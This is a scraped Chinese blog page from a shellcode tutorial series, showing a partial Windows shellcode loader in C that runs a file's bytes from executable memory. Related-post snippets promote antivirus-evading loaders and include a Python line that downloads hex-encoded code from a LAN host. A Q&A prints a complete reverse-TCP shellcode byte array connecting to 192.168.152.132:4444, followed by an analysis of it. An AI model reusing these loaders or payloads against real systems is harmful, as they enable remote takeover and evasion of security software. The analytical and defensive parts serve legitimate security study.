第10章 shellcode实战:15 编写shellcode加载器

已于 2025-07-28 21:53:32 修改
阅读量684 收藏
点赞数 10
CC 4.0 BY-SA版权
分类专栏: shellcode入门与实战 文章标签: c++ c语言 系统安全 网络安全
于 2024-05-14 10:37:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Qyears/article/details/138844192
本文介绍了如何编写一个简单的shellcode加载器,该加载器能够读取本地shellcode文件,分配内存并赋予执行权限,然后执行shellcode内容。提供直接拖拽文件执行和通过cmd命令行两种运行方式。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

我们编写一个最简单的shellcode加载工具,应用于将本地的shellcode文件执行起来。

shellcode加载器基本功能:

  1. 通过传入的参数,读取shellcode文件内容;
  2. 申请与shellcode文件大小相同的内存空间;
  3. 修改申请的内存,使其具备可读可写可执行的属性;
  4. 将shellcode文件内容读取到该内存;
  5. 调用shellcode执行(跳转到该内存首地址并执行)。
#include <stdio.h>
#include <windows.h>

int main(int argc, char* argv[])
{
    // 程序运行时必须传入一个目标shellcode文件路径的参数
    if (argc == 2)
    {
        // 读取传入的shellcode文件路径
        HANDLE hSCFile = CreateFileA(argv[1], GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);
        if (hSCFile == INVALID_HANDLE_VALUE)
        {
            return 0;
        }

        DWORD dwHighSize = 0;
        // 获取shellcode文件大小
        DWORD dwFileSize = GetFileSize(hSCFile, &
了解本专栏 订阅专栏 解锁全文 超级会员免费看
10 shellcode实战:18 神级开源shellcode工具:donut
李小咖·网安技术库
05-15 1996
Donut是一款shellcode生成器,可将C/C++C#生成的PE文件转换为shellcode文件,同时支持JS、XSL、VBS脚本转换为shellcode。以下“原生”EXE/DLL指非托管PE文件(包括并不限于C/C++、delphie等编写生成的可执行文件),可以直接由系统加载运行,区别于.Net生成的托管文件。被处理exe/dll为32位程序,则需要用32为的shellcode加载器启用,exe/dll为64位的就用64位shellcode加载器启用。
10 shellcode实战:16 实战:文件转shellcode
李小咖·网安技术库
05-14 2174
我最近做了一个关于shellcode入门和开发的专题课👩🏻‍💻,主要面向对网络安全技术感兴趣的小伙伴。这是视频版内容对应的文字版材料,内容里面的每一个环境我都亲自测试实操过的记录,有需要的小伙伴可以参考。
go编写加载器绕过云沙箱
qq_60870726的博客
11-19 1014
go build main.go // 当前编译的可执行文件在当前目录go build -o xxx.exe// 指定编译后的文件名称go run main.go // 编译的可执行文件放在%tmp%临时目录 , 下次编译会覆盖之前的 , 不会产生冗余。
shellcode加载器
goat_2003的博客
09-10 1773
编写shellcode不能使用绝对地址,因为当我们加载到其他函数中时绝对地址储存的可能什么也没有,甚至是其他函数,所以当我们需要调用一个函数时,需要动态获取函数的地址实现调用。 想要动态获取函数地址,可以使用以下函数 GetProcAddress 从dll中获取函数的地址 LoadLibraryA 将指定的模块加载到调用进程的地址空间中 举个例子: LPVOID lp = GetProcAddress(LoadLibraryA("user32.dll"),"MessageBoxA"); _asm {
恶意软件开发入门:基础Shellcode加载器实战解析
最新发布
gitblog_00107的博客
06-28 379
恶意软件开发入门:基础Shellcode加载器实战解析 前言 在安全研究和渗透测试领域,理解恶意软件的工作原理至关重要。本文将深入探讨如何构建一个基础的Shellcode加载器,这是安全研究中基础且核心的技术之一。 Shellcode加载器基础概念 Shellcode加载器是一种能够将二进制代码(Shellcode)加载到内存并执行的程序。它在渗透测试、红队行动以及安全研究中有着广泛的应用。一个典...
c++shellcode加载器
qq_44657899的博客
05-26 4145
目录VirtualAlloc申请内存堆 VirtualAlloc申请内存 #include <windows.h> #include <iostream> #include <time.h> #pragma comment (lib, "winmm.lib") #pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") void startShellCode() { unsi
python编写shellcode_python生成shellcode加载器
weixin_39763293的博客
12-19 580
import ctypes, cPickle, base64, urllib2class ptr(object):def __reduce__(self):return(eval, ("urllib2.urlopen('http://192.168.1.100/s2.txt').read().decode('hex')",))# base64class buf(object):def __init...
什么是shellcode加载器
m0_57836225的博客
08-13 350
在安全领域,恶意的 Shellcode 加载器常用于网络攻击和恶意软件中,对系统的安全构成威胁。4. 执行控制转移:通过某种方式将程序的执行流程转移到已写入的 Shellcode 所在的内存地址,从而开始执行 Shellcode 中的指令。Shellcode 通常是一段精心编写的机器码,用于在目标系统上执行特定的恶意或非恶意操作,比如获取系统权限、执行特定功能等。1. 分配内存:加载器首先在目标进程的内存空间中分配一段可执行的内存区域,用于存储即将加载的 Shellcode
NimShellCodeLoader:使用nim编写shellcode加载器
02-03
NimShellCodeLoader Nim编写Windows平台shellcode免杀加载器 快速生成免杀毒性文件 更新: 20210123:增加三种加载shellcode方式,其中两种使用了库,需要安装该库才能正常编译 特点: 1:自带通常加载方式 2:可自行拓展加载方式 3:支持两种加密技术,分别位3des加密和凯撒密码,密钥随机,每次生成文件拥有不同的哈希 完全针对技术研究和获得正式授权的测试活动。 ##文件组成: bin中存放生成的重组文件 encryption存储加密代码文件 module中存放c ++功能文件 安装: 1,安装nim最新版 2,下载本项目,分别编译encryption中的Tdea.nim和Caesar.nim 。 nim c -d:release --opt:size Tdea.nim nim c -d:release --opt:size Caesar.nim 3,编译c#项目,将初始化文件放到当前目录 使用方法: 1,打开生成器 2,将有效载荷到该窗口 3,选择加载方式,点击生成,还原文件会保存到bin文件夹中 拓展: 1,新建ni
10 shellcode实战:12 第二种shellcode编写实战(1)
李小咖·网安技术库
05-11 999
我最近在做一个关于shellcode入门和开发的专题课👩🏻‍💻,主要面向对网络安全技术感兴趣的小伙伴。这是视频版内容对应的文字版材料,内容里面的每一个环境我都亲自测试实操过的记录,有需要的小伙伴可以参考🫡。
10 shellcode实战:01 什么是shellcode
李小咖·网安技术库
04-27 2124
这是我做的一个关于shellcode入门和开发的专题课👩🏻‍💻,主要面向对网络安全技术感兴趣的小伙伴。这是视频版内容对应的文字版材料,内容里面的每一个环境我都亲自测试实操过的记录,有需要的小伙伴可以参考🫡
绕过AV:免杀shellcode加载器
03-04
旁路AV 条件触发式远控VT 6/70免杀国内杀软及后卫,卡巴斯基等主流杀软 原理 使用 将shellcode填至go_shellcode_encode.py生成重复后的base64有效负载然后将生成的payload填至main.go build(“ b64shellcode”)将main.go中的网址替换为您vbs的某个网页或文本(称为网页同样可以,但是需要程序可以正常使用时此网页需要可以访问)编译:go build -ldflags =“-w -s -H = windowsgui”
shellcodeloader:shellcodeloader
03-11
ShellcodeLoader 语言: Windows的ShellcodeLoader可以绕过AV。 特征 它具有多种加载模式。 32位有13种加载模式,而64位有12种加载模式。 支持发展。 如果发现新的攻击手段,则可以根据指定的方法开发模板。 Shellcode是自动加密的。来自同一Shellcode加载器的md5不同,因为生成器使用时间作为种子来随机生成128位密钥进行加密。 待办事项清单 环境:生成器使用MFC来实现UI,生成器和加载器模板使用C ++开发,并由VS2015静态编译。 方法:使用vs2015打开项目解决方案(.sln),然后进行编译。当然,您可以从下载产品。 档案文件 该工具由一个生成器(Shellcodeloader.exe)和许多加载器模板组成。 需要将不同的加载器模板放置在目录的相应目录中。 最后放在生成器相同目录下的DATA文件夹中。 如何使用 打开
0基础写shellcode加载器
qq_60870726的博客
11-12 2035
从0开始了解shellcode加载器
c#加载shellcode
bring_coco的博客
11-15 865
两个方法,命名空间注意和项目一致,一个loader类,一个Main类,Main调用loader类中的test方法。得到a.txt文件改名为config.txt(这里改名不改名都可以,因为后面资源文件名字改掉就好)是匹配的才可以,所以结合之前的config(资源名字)匹配就可以资源加载了。这里项目需要通过添加资源文件,因为是从资源文件中读取的shellcode。新建完之后先修改名称为之前代码中的config,也就是和下面这块。添加进来即可,这里命名空间都是对的都是项目的命名空间。
探索Shellcode_Loader:一款高效、灵活的Shellcode加载器
gitblog_00002的博客
04-22 873
探索Shellcode_Loader:一款高效、灵活的Shellcode加载器 去发现同类优质开源项目:https://gitcode.com/ 在安全研究和逆向工程领域,Shellcode是一个关键元素,它是一段可以直接由处理器执行的小型机器码程序。然而,如何安全且有效地加载这些代码并不总是那么简单。这就是项目的用武之地。本文将带你深入了解这款工具的功能、技术实现及应用场景。 项目简介 Shel...
免杀之浅谈shellcode加载器
qq_46217803的博客
12-26 1985
VirtualAlloc:申请一个虚拟地址的空间,可以说为虚拟空间到物理空间的映射,简单来说,在虚拟空间操作,物理空间就会自动的分配物理地址。可以直接在内存中运行,不需要一个完整的pe结构,简单来说,内存能执行就能运行,没有啥依赖的“生存环境”设置一个指针类型的,也可以是别的,这里设置成NULL,这样系统会自动的去分配一个空间区域。就是一个类型属性,主要是内存分配的类型属性,可以去百度的,这里设置了两个值,去了解一下。还是以上的shellcode,本地生成的,用的是Visual Studio。
记一次Go语言的学习--shellcode加载器免杀
jjjjj34的博客
04-24 2974
在网上搜了很多关于Go语言的免杀,我也是刚学几天,就做个学习对于GO语言做免杀的记录。
【免杀对抗】远程加载AES+XOR异或加密的ShellCode加载器 过国内杀软
qq_35942869的博客
03-28 2408
纯萌新,尝试一下免杀,最近也是查了很多资料,面向Github编程借鉴了很多大佬的代码。通过XOR异或加密后再进行AES加密,然后通过修改shellcode加载方式进行简单的免杀。
``` unsigned char buf[] = "\xfc\xe8\x8f\x00\x00\x00\x60\x31\xd2\x64\x8b\x52\x30\x8b" "\x52\x0c\x89\xe5\x8b\x52\x14\x31\xff\x8b\x72\x28\x0f\xb7" "\x4a\x26\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" "\x01\xc7\x49\x75\xef\x52\x8b\x52\x10\x57\x8b\x42\x3c\x01" "\xd0\x8b\x40\x78\x85\xc0\x74\x4c\x01\xd0\x8b\x48\x18\x8b" "\x58\x20\x50\x01\xd3\x85\xc9\x74\x3c\x49\x31\xff\x8b\x34" "\x8b\x01\xd6\x31\xc0\xc1\xcf\x0d\xac\x01\xc7\x38\xe0\x75" "\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe0\x58\x8b\x58\x24\x01" "\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01" "\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58" "\x5f\x5a\x8b\x12\xe9\x80\xff\xff\xff\x5d\x68\x33\x32\x00" "\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\x89\xe8" "\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80" "\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\x98\x84\x68\x02\x00" "\x11\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea" "\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74" "\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67" "\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f" "\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10" "\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53" "\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8" "\x00\x7d\x28\x58\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b" "\x2f\x0f\x30\xff\xd5\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e" "\x5e\xff\x0c\x24\x0f\x85\x70\xff\xff\xff\xe9\x9b\xff\xff" "\xff\x01\xc3\x29\xc6\x75\xc1\xc3\xbb\xf0\xb5\xa2\x56\x6a" "\x00\x53\xff\xd5";```分析下面代码功能
03-18
<think>嗯,我现在需要分析用户提供的这段用C语言编写的unsigned char数组,里面是一连串十六进制字节。看起来像是shellcode,也就是一段可执行的机器码。首先,我应该先看看这些字节对应的汇编指令是什么,这样才能了解它的功能。 首先,用户提供的代码是一个字节数组,每个字节都用\x开头表示十六进制。比如第一个字节是\xfc,对应的是机器码fc。在x86架构中,这个操作码是CLD指令,用于清除方向标志,通常是在shellcode开始时用来确保字符串操作的方向正确。接下来的\xe8可能对应CALL指令,不过需要结合后面的字节来看。 接下来,我需要把整个字节数组转换成汇编指令。这可能需要用反汇编工具,比如ndisasm或者在线反汇编器。假设我没有现成的工具,只能手动分析一些关键部分。例如,常见的shellcode结构通常是用来建立反向连接或者绑定shell的。 让我看一下中间的字符串部分。比如,在字节数组的后半部分有\x68\x77\x73\x32\x5f,这对应的是PUSH操作,后面跟着的四个字节是ws2_,可能是在构造“ws2_32.dll”字符串的一部分,因为这是Windows中处理网络通信的库。接着还有\x68\x4c\x77\x26\x07,这个可能是一个地址或者数值,用于加载库函数。 另外,后面有\x68\xc0\xa8\x98\x84,这是将IP地址192.168.152.132压入栈,可能是目标IP地址。接着的\x68\x02\x00\x11\x5c对应端口4444(0x115c是大端表示,转换为十进制是4444)。所以这部分可能是在设置一个反向连接到192.168.152.132:4444。 此外,代码中调用了多个函数,可能通过查找PEB(进程环境块)来定位必要的API函数地址,比如LoadLibraryA、GetProcAddress等,以便加载ws2_32.dll并使用socket相关函数建立连接。例如,代码中的一些指令可能是在解析kernel32.dll的导出表,找到需要的函数地址。 综合来看,这段shellcode的功能可能是创建一个反向TCP连接,连接到指定的IP地址和端口,然后提供一个命令行shell。这通常用于渗透测试中的反弹shell利用,但也可以被恶意软件用来获取远程访问权限。 需要注意的是,执行这样的代码可能会导致安全风险,因为它可能允许攻击者控制受害者的计算机。因此,处理此类代码时应格外小心,最好在受控的虚拟环境中进行分析。</think>这段代码是典型的 **Shellcode**,通常用于漏洞利用中执行恶意操作。下面是逐步分析: --- ### **一、基础判断** 1. **数据类型**:`unsigned char buf[]` 存储的是二进制机器码(十六进制形式) 2. **特征识别**: - 开头的 `\xfc\xe8` 是 x86 架构的机器指令,对应汇编指令 `cld; call` - 后续包含多个 `\x68`(`push` 指令)和 `\x00`(空字节),常见于 Shellcode --- ### **二、关键功能分析** #### **1. 初始化操作** - `\xfc`:`cld` 指令清除方向标志,确保字符串操作方向正确 - `\xe8\x8f\x00\x00\x00`:`call` 指令跳转到后续代码(用于定位 API 函数地址) #### **2. 动态获取 API 函数** - **代码特征**: ```asm mov edx, [fs:0x30] ; 获取 PEB 地址 mov edx, [edx+0x0c] ; 获取 PEB_LDR_DATA mov edx, [edx+0x14] ; 获取模块链表 ``` - 通过遍历 **PEB(进程环境块)** 获取 `kernel32.dll` 基地址 - 解析导出表,动态获取 `LoadLibraryA` 和 `GetProcAddress` 函数地址 #### **3. 网络功能加载** - **关键字符串**: ```asm push 0x00773332 ; "ws2_32" push 0x5f327377 ; "ws2_32.dll" 的哈希值 ``` - 加载 `ws2_32.dll`(Windows 网络库) - 调用 `WSAStartup` 初始化 Winsock #### **4. 反向连接(Reverse Shell)** - **IP 和端口设置**: ```asm push 0x84a8c0c0 ; IP 地址 192.168.152.132(小端格式) push 0x5c110002 ; 端口 4444(0x115c) + AF_INET(0x0002) ``` - 创建 Socket 并连接到目标 IP:Port - 通过 `CreateProcessA` 启动 `cmd.exe`,实现反向 Shell --- ### **三、技术细节** 1. **规避空字符**:所有指令避免 `\x00`(空字节),防止字符串函数截断 2. **自定位代码**:通过 `call/pop` 组合动态获取当前指令地址 3. **哈希处理**:对 API 函数名进行哈希,避免直接暴露字符串 --- ### **四、潜在风险** - **恶意行为**:此代码可用于建立远程控制通道,完全控制目标机器 - **防御建议**: - 使用 DEP/ASLR 防护技术 - 监控异常网络连接 - 禁止执行堆栈中的代码 --- ### **五、验证方法** 1. **反汇编工具**:使用 `ndisasm` 或 Immunity Debugger 查看汇编指令 ```bash echo -ne "\xfc\xe8..." | ndisasm -u - ``` 2. **沙箱分析**:在 Cuckoo Sandbox 等隔离环境中运行观察行为 --- **注意**:此代码具有攻击性,请仅在授权环境下分析!
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值